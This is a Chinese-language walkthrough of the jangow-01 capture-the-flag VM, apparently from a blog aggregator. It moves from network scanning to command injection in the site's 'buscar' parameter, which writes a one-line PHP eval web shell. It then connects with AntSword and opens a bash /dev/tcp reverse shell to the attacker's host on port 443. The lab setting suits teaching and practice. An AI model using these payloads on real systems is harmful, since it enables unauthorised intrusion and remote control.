当前位置: 首页 > article >正文

jangow-01-1.0.1靶机攻略

1.进行配置,按住shift,在图一界面按e进去得到图二

.ro 替换为 rw signie init=/bin/bash

ctrl+x,ip a查看网卡信息,修改配置文件网卡信息

修改为如图所示内容后按shift+?然后输入wq点击回车退出,然后重启靶机

2.在kali中

arp-scan -l  扫描靶机ip

3.扫描端口信息

nmap -O 192.168.124.158

4.扫描目录信息

dirb http://192.168.124.158

5.访问靶机ip,点击site

6.进入如下页面,经过探索之后,点击buscar,发现页面的url可以传参

7.我们尝试输入一句话木马到1.php文件中

http://192.168.50.142/site/busque.php?buscar=echo '<?php eval($_POST["cmd"]);' > 1.php

8.我们访问当前目录下的1.php,发现上传成功

http://192.168.124.158/site/1.php

9.复制1.php文件的绝对路径,去蚁剑尝试连接

连接成功!

10.去kali中打开443的监听

nc -lvvp 443

11.在蚂蚁剑中打开终端,输入反弹shell

bash -c 'bash -i >& /dev/tcp/192.168.124.128/443 0>&1'
 

12.成功在kali中监听!


http://www.kler.cn/a/599223.html

相关文章:

  • HTML应用指南:利用POST请求获取城市肯德基门店位置信息
  • 玩转python: 掌握Python常用库之数据分析pandas
  • Elasticsearch 文档
  • Python 正则表达式全攻略:re 库精讲与实战
  • 【python】OpenCV—Hand Detection
  • 内网(域)渗透测试流程和模拟测试day--1--信息收集阶段
  • 具身系列——NLP工程师切入机器人和具身智能方向
  • 如何让机器像人类一样感知声调颤抖与嘴角抽动的同步情感表达?
  • MySQL InnoDB行锁等待时间是怎么引起的?
  • 腾讯云HAI1元体验:DeepSeek-R1模型助力个人博客快速搭建
  • 使用python numpy计算并显示音频数据的频谱信息
  • 内核编程十:进程的虚拟地址空间
  • 机器学习之条件概率
  • 金牛区国际数字影像产业园:文创核心功能深度剖析
  • 【科研工具使用】latex如何插入图片、分段落、插入公式
  • Python实现MySQL数据库对象的血缘分析
  • 智慧路灯杆:点亮未来城市的科技基石
  • 架构思维:通用系统设计方法论_从复杂度分析到技术实现指南
  • mysql入门操作
  • 多线程 --- 进程和线程的基本知识